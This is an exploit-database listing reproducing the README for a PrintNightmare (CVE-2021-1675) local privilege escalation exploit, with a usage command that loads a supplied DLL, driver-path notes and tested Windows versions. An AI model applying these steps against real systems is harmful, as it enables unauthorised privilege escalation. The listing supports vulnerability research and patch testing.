Sploitus

Exploit for CVE-2021-1675 CVE-2021-1675 CVE-2021-34527

githubexploit Β· 2021-07-01

Exploit Code

README37 lines
## https://sploitus.com/exploit?id=64AAF745-D50D-575C-B3FF-A09072475502
# CVE-2021-1675-LPE-EXP
**Simple LPE Exploit of CVE-2021-1675** 

## Usage

```
CVE-2021-1675-LPE.exe C:\test\MyPigDLL.dll
```

`MyPigDLL.dll`,is a test DLL which will create `C:\test.txt` if succeed

## Notice

1. Add `EnumPrinterDriversW` for get `pDriverPath`, so We dont need change the "hardcode Driver path" everytime
2. Dont need to work with RPC or SMB and this exploit will just directly load the dll which you provided
3. The `pDriverPath` at Windows Server 2008 is

```
info.pDriverPath = (LPWSTR)L"C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_neutral_4616c3de1949be6d\\Amd64\\UNIDRV.DLL";
```

I cant get this Path via `EnumPrinterDriversW`, so change the `info.pDriverPath` in source code if you want to test this exploit at Windows Server 2008 


-----
In some situation its also has some bug... plz debug with the rough source code  : )



Test Successed in  :

```
Microsoft Windows Server 2012 R2 Datacenter [η‰ˆζœ¬ 6.3.9600]
Microsoft Windows 10 δΈ“δΈšη‰ˆ [η‰ˆζœ¬ 10.0.19041.685]
Microsoft Windows Server 2008 R2 Enterprise [η‰ˆζœ¬ 6.1.7601]
```